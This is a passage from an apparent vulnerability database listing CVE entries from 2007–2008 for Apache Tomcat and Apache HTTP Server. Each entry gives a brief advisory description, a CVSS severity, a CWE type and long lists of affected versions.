apache tomcat 5.0.22
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 6.0.7
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.0.3
apache tomcat 5.0.13
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 4.0.1
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 5.0.0
apache tomcat 6.0.5
apache tomcat 5.0.7
apache tomcat 5.5.22
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 5.0.12
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 6.0.13
apache tomcat *
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 5.5.10
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 5.0.11
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.0.18
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 5.0.1
CVE-2007-2450 LOW

Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 6.0.7
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.0.3
apache tomcat 5.0.13
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 4.0.1
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 5.0.0
apache tomcat 6.0.5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 6.0.13
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 4.0.6
apache tomcat 5.5.10
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.0.18
apache tomcat 6.0.9
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 5.0.1
CVE-2007-3304 MEDIUM

Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 6.06
redhat enterprise_linux_desktop 5.0
redhat enterprise_linux_workstation 5.0
fedoraproject fedora 7
redhat enterprise_linux_server 5.0
canonical ubuntu_linux 6.10
canonical ubuntu_linux 7.04
CVE-2007-3382 MEDIUM

Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.0.17
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 6.0.7
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 5.0.13
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 6.0.5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 3.3.2
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 6.0.13
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 5.5.10
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.0.18
apache tomcat 6.0.9
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 5.0.1
CVE-2007-3383 MEDIUM

Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.0.0
apache tomcat 4.0.5
apache tomcat 4.1.28
apache tomcat 4.1.1
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.0.1
apache tomcat 4.1.15
apache tomcat 4.0.4
apache tomcat 4.1.0
apache tomcat 4.0.3
apache tomcat 4.1.36
apache tomcat 4.0.2
apache tomcat 4.1.3
apache tomcat 4.0.6
apache tomcat 4.1.24
CVE-2007-3385 MEDIUM

Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.0.17
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 6.0.7
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 5.0.13
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 6.0.5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 3.3.2
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 6.0.13
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 5.5.10
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.0.18
apache tomcat 6.0.9
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 5.0.1
CVE-2007-3847 MEDIUM

The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
apache http_server *
canonical ubuntu_linux 6.06
fedoraproject fedora_core 6
fedoraproject fedora 7
canonical ubuntu_linux 6.10
canonical ubuntu_linux 7.04
CVE-2007-4465 MEDIUM

Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache http_server *
CVE-2007-5000 MEDIUM

Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
apache http_server *
fedoraproject fedora 7
suse linux_enterprise_server 9
canonical ubuntu_linux 6.10
opensuse opensuse 10.2
suse linux_enterprise_server 10
canonical ubuntu_linux 6.06
fedoraproject fedora 8
opensuse opensuse 10.3
suse linux_enterprise_desktop 9
canonical ubuntu_linux 7.04
oracle http_server 10.1.3.5.0
CVE-2007-5333 MEDIUM

Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2007-5342 MEDIUM

The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 6.0.13
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 6.0.6
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.20
apache tomcat 5.5.23
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.5.19
apache tomcat 6.0.2
apache tomcat 6.0.11
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 6.0.9
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 6.0.3
apache tomcat 5.5.22
apache tomcat 6.0.14
CVE-2007-5461 LOW

Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.

CVSS 2.0

Severity: LOW

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.16
apache tomcat 4.1.33
apache tomcat 4.0.0
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 4.1.28
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.10
apache tomcat 4.1.34
apache tomcat 4.1.31
apache tomcat 4.1.15
apache tomcat 4.0.4
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 4.1.12
apache tomcat 4.1.17
apache tomcat 4.1.25
apache tomcat 4.1.4
apache tomcat 4.1.35
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.0.6
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 4.1.19
apache tomcat 4.1.11
apache tomcat 4.0.5
apache tomcat 4.1.27
apache tomcat 4.0.1
apache tomcat 4.1.9
apache tomcat 4.1.0
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 4.1.23
apache tomcat 4.1.6
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 4.1.3
CVE-2007-6286 MEDIUM

Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 6.0.13
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 6.0.6
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.16
apache tomcat 6.0.15
apache tomcat 5.5.20
apache tomcat 5.5.23
apache tomcat 6.0.0
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.5.19
apache tomcat 6.0.2
apache tomcat 6.0.11
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 6.0.9
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 6.0.3
apache tomcat 5.5.22
apache tomcat 6.0.14
CVE-2007-6388 MEDIUM

Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server *
CVE-2007-6420 MEDIUM

Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache http_server 2.2.2
apache http_server 2.2.6
apache http_server -
apache http_server 2.2.0
apache http_server 2.2.3
apache http_server 2.2.4
CVE-2007-6421 LOW

Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 2.2.2
apache http_server 2.2.6
apache http_server -
apache http_server 2.2.1
apache http_server 2.2.3
apache http_server 2.2.4
apache http_server 2.2
CVE-2007-6422 MEDIUM

The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.2.2
apache http_server 2.2.6
apache http_server -
apache http_server 2.2.1
apache http_server 2.2.3
apache http_server 2.2.4
apache http_server 2.2
CVE-2007-6423 HIGH

Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.2.2
apache http_server 2.2.6
apache http_server -
apache http_server 2.2.3
apache http_server 2.2.4
CVE-2007-6750 MEDIUM

The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 1.0.2
apache http_server 2.1.4
apache http_server 2.1.9
apache http_server 2.2.1
apache http_server 1.3.14
apache http_server 1.3.34
apache http_server 1.1.1
apache http_server 2.2.0
apache http_server 2.0.44
apache http_server 1.3.27
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 1.3.24
apache http_server 1.3.9
apache http_server 2.0.40
apache http_server 1.3.68
apache http_server 1.3.1.1
apache http_server 2.2.13
apache http_server 1.3.65
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 1.3.2
apache http_server 1.3.0
apache http_server 2.0.45
apache http_server 1.3.18
apache http_server 2.0.51
apache http_server 1.3.38
apache http_server 2.0.37
apache http_server 2.2.10
apache http_server *
apache http_server 2.1
apache http_server 1.3.33
apache http_server 2.0
apache http_server 2.2.2
apache http_server 1.3.39
apache http_server 2.0.53
apache http_server 2.1.8
apache http_server 2.1.7
apache http_server 2.2.6
apache http_server 2.0.43
apache http_server 1.0
apache http_server 1.3.25
apache http_server 2.0.38
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 2.0.57
apache http_server 1.3.6
apache http_server 1.3.32
apache http_server 1.2
apache http_server 1.3.28
apache http_server 1.3.13
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.1.5
apache http_server 2.0.28
apache http_server 1.3.42
apache http_server 1.3.19
apache http_server 1.3.5
apache http_server 1.0.5
apache http_server 2.0.61
apache http_server 1.3.4
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 2.2
apache http_server 1.1
apache http_server 1.3.10
apache http_server 2.1.1
apache http_server 1.3.29
apache http_server 1.3.16
apache http_server 2.1.6
apache http_server 1.3.36
apache http_server 1.2.6
apache http_server 1.3.23
apache http_server 1.3.31
apache http_server 2.0.32
apache http_server 1.3.30
apache http_server 1.3.1
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 1.99
apache http_server 2.0.46
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 2.0.59
apache http_server 1.3.41
apache http_server 1.3.20
apache http_server 2.2.3
apache http_server 1.4.0
apache http_server 1.2.9
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.2.9
apache http_server 1.3.22
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 1.3.15
apache http_server 2.0.42
apache http_server 1.3.11
apache http_server 2.0.55
apache http_server 1.3.35
apache http_server 2.0.63
apache http_server 2.1.2
apache http_server 1.0.3
apache http_server 1.3
apache http_server 2.0.60
apache http_server 1.3.37
apache http_server 1.3.8
apache http_server 1.2.4
apache http_server 2.0.54
apache http_server 1.2.5
apache http_server 2.0.34
apache http_server 2.1.3
apache http_server 1.3.3
CVE-2008-0005 MEDIUM

mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
apache http_server *
canonical ubuntu_linux 6.06
fedoraproject fedora 8
fedoraproject fedora 7
canonical ubuntu_linux 6.10
canonical ubuntu_linux 7.04
CVE-2008-0128 MEDIUM

The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2008-0455 MEDIUM

Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server *
redhat enterprise_linux_desktop 5.0
redhat enterprise_linux_workstation 5.0
redhat jboss_enterprise_application_platform 6.0.0
redhat jboss_enterprise_application_platform 6.4.0
redhat enterprise_linux_server 5.0
CVE-2008-0456 LOW

CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.

CVSS 2.0

Severity: LOW

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache http_server *
redhat enterprise_linux_desktop 5.0
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_server 5.0
CVE-2008-1232 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2008-1947 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 6.0.13
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 6.0.6
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.20
apache tomcat 5.5.23
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.5.19
apache tomcat 6.0.2
apache tomcat 6.0.11
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 6.0.9
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 6.0.3
apache tomcat 5.5.22
apache tomcat 6.0.14
CVE-2008-2364 MEDIUM

The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
apache http_server *
redhat enterprise_linux_desktop 4.0
redhat enterprise_linux_desktop 5.0
redhat enterprise_linux_server 3.0
redhat enterprise_linux_server 4.0
redhat enterprise_linux_desktop 3.0
fedoraproject fedora 9
canonical ubuntu_linux 8.04
canonical ubuntu_linux 6.06
fedoraproject fedora 8
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_eus 5.2
redhat enterprise_linux_workstation 3.0
redhat enterprise_linux_workstation 4.0
redhat enterprise_linux_server 5.0
redhat enterprise_linux_eus 4.7
CVE-2008-2370 MEDIUM

Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.34
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 4.1.17
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 4.1.4
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 4.1.19
apache tomcat 5.5.16
apache tomcat 4.1.11
apache tomcat 4.1.37
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 6.0.13
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.6
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 4.1.0
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 4.1.23
apache tomcat 6.0.9
apache tomcat 4.1.6
